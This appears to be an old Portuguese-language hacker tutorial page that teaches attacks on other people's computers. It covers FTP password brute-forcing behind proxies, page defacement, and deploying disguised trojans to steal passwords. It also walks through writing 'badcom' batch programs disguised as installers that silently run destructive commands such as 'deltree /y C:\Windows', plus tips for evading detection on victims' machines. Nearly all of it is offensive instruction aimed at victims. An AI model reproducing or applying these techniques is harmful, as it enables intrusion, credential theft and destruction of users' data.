tópicos______________________________________________________
 
  • Rapidas definições
  • Ataque por FTP
  • Utilização de trojans
  • Criação de Badcom's
  • Dicas
definições______________________________________________________
 
  • Os Hackers todos sabemos quem são. Eles invadem em benefício próprio. Eles pegam tudo e não destroem nada. Portanto, diferente dos crackers.
  • Os Crackers são como os hackers, mas gostam de ver a destruição, eles invadem e destroem só para ver o caos depois na TV.
  • Os Phreackers são os piratas da telefonia, eles fazem de tudo que é relativo aos telefones, convencionais ou celulares.
  • Os Carders, aqueles que fazem compras com cartão de crédito alheio ou gerado, ou seja, os Carders tem uma grande facilidade de comprar pela Internet.
                                                       Escrito por Søul ßurn

ataque por FTP_________________________________________________
 

A invasão por FTP é, de certa forma, simples de ser efetuadas, embora seja muito lenta e cansativa. Para isso exercê-la, você pode usar programas como o WebCracker e uma boa Wordlist, embora existam melhores programas.Este processo nada mais é do que um "jogo de tentativa e erro", onde você pode esperar o programa trabalhar, ou você mesmo pode entrar em ação, caso você tenha informações sobre o proprietário ta conta que você quer hackear; mas não se esqueça que nada que produza um bom resultado é fácil de ser realizado. Na maioria das vezes os servidores matêm logado os IPs que tiveram tentativas frustadas ao tentarem a conexão com o servidor FTP, por isso, não se esqueça de sempre, mas sempre utilizar um proxy anônimo quando for realizar este tipo de ataque... senão, isso pode ter consequencias mais graves do que você imagina. Bom, este tipo de ataque geralmente é utilizado para o hackeamento de páginas ou para a aquisição do arquivo se senhas do provedor, e como fazê-lo? Da seguinte forma: Suponhamos que você queira hackear um página, já conseguiu o Login e Senha dela, aí já tá na mão... é so usar um programa qualquer como o WS_FTP ou qualquer outro e modificar o código HTML da página. No caso do furto do arquivo de senhas, a coisa muda de figura... nunca subestime um Sysop, ele é mais inteligente do que você imagina, e, provavelmente não vai deixar o arquivo exposto no diretório /etc para que você possa simplesmente ir lá baixar o arquivo, então, provavelmente  terá que sair procurar o arquivo pelos diretórios e depois, você pode utilizar a mesma wordlist usada anteriormente para desencryptar o arquivo de senhas. Lembre-se que somente entrando "anonymous" em um provedo você NÃO estará hackeando...

                                                        Escrito por Søul ßurn

utilização de trojans__________________________________________
 

Aqui farei uma breve descrição de como se utilizar um trojan, mas antes, uma definição sempre ajuda. O trojan ou trojan horse (Caválo de Tróia) é um programa elaborado para tirar proveito da ingenuidade das pessoas. Os trojans, geralmente são aplicativos de cliente/servidor, que, não algum computador está com a parte "servidor" rodando, ele está totalmente vulnerável a um ataque, que fatalmente ocorrerá. O servidor disponibiliza uma porta especifica que fica aguardando o momento da conexão com o cliente. Quando conectado ao servidor, o cliente proporciona ao seu operador um total controle sobre a máquivo servidora, possuindo até mesmo "poder" maior que o operador local da máquina servidora.
Este tipo de ataque é muito simples de ser efetuado, basta um pouco de prática. Geralmente, estes trojans são compostos de três programas: um é o clique, outro é o servidor e o terceiro é um programa que configura o servidor. O primeiro passo seria configurar o servidor, escolhendo a porta a ser aberta, proteção com password, a forma de alocação do servidor na máquina da vítima e alguns outros utilitários mais. Após o servidor estar pronto, deve-se partir para a infecção da vítima, esta, para alguns, provavelmente é a parte mais difícil: você pode disfarçá-lo como uma foto, jogo, ou alguma outra coisa mais que seja mais convincente. Agora a última e mais divertida parte: conectando-se ao servidor!!! Abra então o cliente, caso tenha alterado a porta default ao editar o servidor, deve-se também alterá-la no cliente, caso contrário não haverá conexão. Feito isso, pega-se o IP da vítima e coloca-o no cliente e, após a conexão estabelecida, caso tenha optado pela proteção com password, aparecerá uma caixa onde a senha escolhida deverá ser digitada, de forma que, se a mesma estiver incorréta, você será imediatamente desconectado. Se a conexão for bem sucedida, você já está pronto para fazer o que quiser... Como copiar arquivos, roubar senhas, etc... A única coisa que peço para que não fazerem é destruir dados, isso não compensa; não leva a nada. Os trojans, podem ser usados não somente para a invasão, como também para a aquisição de senhas do micro da vítima. Existem muitos desses programas, alguns simples, outros sofisticados, os simples geralmente gravam as senhas em um arquivo que é escondido em algum diretório pouco acessado pelo usuário local, para o que "hacker" possa recuperá-lo posteriormente, entretanto, existem programas como o "K2PS" que registram TODOS os passwords digitados pela vítima, e assim que o computador é conectado a rede, um e-mail contendo todas as senhas é enviado ao intruso, sem que a vítima suspeite.

                                                         Escrito por Søul ßurn

criação de badcom's____________________________________________
 

Badcom's  são programas de lote, que, após concluídos, são compilados de .BAT passando para .COM, onde seu font já não pode mais ser visto. Estes programas de lote são bem úteis e simples de serem criados, para quem é um bom conhecedor dos comandos do MS-DOS. Neste texto explicarei somente os comandos básicos para a criação dos badcom's:
 

ECHO
Comando utilizado para enviar mensagens de tela, ocultar ou exibir os comandos que serão dados posteriormente pelo Badcom. O comando é usado seguido de "ON" para ativar o ECHO ou "OFF" para desativá-lo. Exemplo:

@echo off        <desativa o echo, ocultando os comandos seguintes>
@echo on         <ativa o echo, passando a exibir os comandos>

Perceba que a "@" foi utilizada para que nem mesmo a utilização do comando "echo" fosse exibida. Caso o Echo esteja desativado e você queira mandar uma mensagem de tela, faço o seguinte:

                       Echo "Digite sua mensagem aqui"
               <Sem as aspas>
 

MD
Utilizado para a criação de diretórios. Exemplo:

                           Md "nome_do_diretóroio"
                               <sem as aspas>
 

RD
Deve-se usar para a remoção de diretórios totalmente vazios. Exemplo:

            Rd "nome_do_diretório"
                              <sem as aspas>
 

ATTRIB
Este é utilizado para definir atributo aos arquivos, podendo ocultá-los, protegê-los contra gravação e remoção, definí-los como arquivos do sistema ou como um arquivo arquivado.Exemplo:

Attrib +H teste.doc <Ativa atributo oculto no arquivo teste.doc>
Attrib +R teste.doc <Ativo atributo arquivo simpels em teste.doc>
Attrib +A teste.doc <Ativa atributo de arquivo arquivado em teste.doc>
Attrib +S teste.doc <Ativa atributo de arquivo do sistema em teste.doc>
Attrib -H -S -R -A teste.doc <Desativa atributos oculto, de sistema, de
                              arquivo protegido e arquivo arquivo em 
                              teste.doc>
 

DEL
Comando que deletar arquivos especificados pelo usuários. Exemplo:

Del *.exe  <Deletará todos os arquivos .EXE do presente diretório>
Del a*.doc <Deletará arquivos iniciados em A e .DOC do corrente diretório>
Del *.* <Deletará todos os arquivos do corrente diretório, exceto os que
         estiverem protegidos com atributo "+R">
Del c:\windwos\system\*.dll <Deletará todos os arquivos .dll da subpasta 
                             C:\WINDOWS\System>
 

DELTREE
Este pode ser considerado um dos mais perigosos comandos, pois é simples de ser usado, e, caso ocorra um pequeno erro em sua utilização, ele pode causar sérios danos.. Este comando pode deletar qualquer arquivo, mesmo estando oculto ou protegido contra gravação. Seu funcionamente é mais ou menos como o do DEL. Exemplo:

                      Deltree "caminho_a_deletar"
                             <Sem as aspas>

Deste forma, quando o micro receber a ordem de executar o comando, será exibibda uma mensagem de confirmação da exclusão, e dificilmente o usuario concordará com a exclusão. Exemplo:

Deltree C:\Win98 [ENTER]
Excluir a pasta "Win98" e todas as suas subpastas?[sn]

Entretanto há uma opção que retira este BUG do deltree, tornando o comando ainda mais destrutivo. Para isso, deve-se usar a opção: /Y. Exemplo:

Deltree /y C:\Windows [ENTER]
Excluindo "Windows"...
 

REN
O Ren é um comando utilizado para renomear arquivos. embora ele não seja destrutivo, ele é um comando que pode causar muitos problemas ao usuário. Com ele, você pode camuflar arquivos seus ou de seus programas, na máquina da vítima, sem que ele tenha idéia do que seja, ou até mesmo renomeat os arquivos necessários para o BOOT do micro, o Win.com, entre outros. Seu funcionamento ocorre da seguinte forma: Dá-se o comando, seguido do nome original do arquivos e, logo após, o nome que deve ser tomado.Exemplo:

Ren "novo_original" "novo_nome" [ENTER]
         <sem as aspas>
 

MOVE
O Move é outro comando que também pode ser de muita utilidade. Ele server como um mobilizador de arquivos, tirando-os de um lugar e colocando-os em outro. Exemplo:

Move c:\windows\javainst.log c:\java [ENTER]
C:\Windows\javainst.log => C:\Java\javainst.log [ok]

No exemplo acima, o arquivo "javainst.log" foi retirado do diretório "C:\Windows" e colocado no diretório "C:\Java", ao final, é exibido "[ok]" indicando que a transferência foi efetuada com êxito.
 

PAUSE
O pause é um comnado de simples utilização, porém, ele propociona um toque a mais de realidade em seus badcom's. Exemplo:

Pause [ENTER]
Pressione qualquer tecla para continuar . . .
 

GOTO
Goto é o comando utilizado para que o programa retorne ou avance a uma  parte do Badcom especificada pelo usuário. Deve ser utilizado quando você desejar que o programa repita uma série de comandos infinitamente, ou até que o usuário finalize o Badcom. Exemplo:

@echo off
cls

:BEGIN  [<------ Especifica que o grupo BEGIN inicia-se aqui]
echo.
echo -=## ßåТØm ##=-
echo BaDcOm By Søul ßurn
echo BaDcOm'S nAmE: Cå§h (V)åKëR v1.0
echo Thņ'§ i† !¡!
echo -=## ßåТØm ##=-
echo.

GOTO BEGIN  [<------  Especifica para onde o programa deve retornar]
 

CHOICE, IF e ERRORLEVEL

A utilização destes comandos em conjunto, cria um prompt para que o usuário escolhe uma das opções disponiblizadas pelo Badcom, simulando um menu de opções. Exemplo:

@echo off
cls
echo » O que deseja fazer com este arquivo? «
echo »1«     Copiar Arquivo
echo »2«     Deletar Arquivo
echo »3«     Sair do Menu
choice /c123
if errorlevel 3 goto Copy
if errorlevel 2 goto Del
if errorlevel 1 goto Quit

:Copy
copy arquivo c:\
goto Quit

:Del
Del arquivo
goto Quit

:Quit
Cls
 

EXIST
Este é mais um comando avançado para se utilizar em Badcom's. Ele pode ser combinado com o comando IF. Sua função é a seguinte:Suponhamos que você queira excluir o diretório "C:\CGI" e você não tem certeza que o diretório exista na máquina da vítima, e, caso você coloque o comando para deletar o arquivo e ele não for encontrado, a vítima verá a mensagem de erro e suspeitará de você, pois você que passou-lhe o programa. Então para que não ocorra esta desconfiança por parte da vítima, você deve utilizar o comando EXIST da seguinte forma:

If exist C:\CGI deltree /y C:\CGI

Ou seja: Se existe C:\CGI então delete C:\CGI; literalmente seria mais ou menos isso. 
 

COMPLEMENTOS
Para que seu Badcom fique com aspectos mais convincentes de que realmente é um programa de instalação ou algo similar, e levante menos suspeitas na vítima, você pode também usar comando como o MEM e muitos outros outros, ou até mesmo inserir imagens, utilizando outros programas. Aqui darei uma breve instrução de como utilizar o comando MEM em seus Badcom's.
 

MEM
O comando MEM é um comando utilizado para exibir a quantidade de memória livre e utilizada. Ele pode ser muito util na simulação de verif'cação de memória livre em sistema, por exemplo:

@echo off
cls
echo Iniciando a instalação!
pause
echo Checando a memória disponível em sistema . . .
mem 
echo Teste OK... 
echo Continuando a instalação.

Este foi um exemplo muito simples, foi a primeira coisa que me veio na cabeça, mas, em seus Badcom's você pode e deve melhorar este exemplo 100%.

                                                         Escrito por Søul ßurn

dicas__________________________________________________________
 

  • Sempre que você for tentar infectar alguém através do ICQ, sempre disfarça o seu IP, utilizando um Proxy SOCKS5 ou qualquer outro método.
  • Ao invadir uma máquina, a primeira coisa que deve ser feita é deletar os arquivos "C:\Windows\Arp.exe" e "C:\Windows\Netstat.exe", assim você correrá menos riscos.
  • Outra coisa muito importante é sempre tomar cuidado com seus Scans... Tudo bem que isso não é ilegal, mas você pode ter problemas se Scanear os lugares errados. Ao Scanear, seu IP poderá ficar logado e posteriormente, seu pai receberá algumas ligações, caso você ainda não seja maior de idade.
                                                      Escrito por Søul ßurn
 
 
 

 

- |main| - |hack| - |phreack| - |tutorial| - |files| - |links| - |proxies| - |contact| - |webboard| -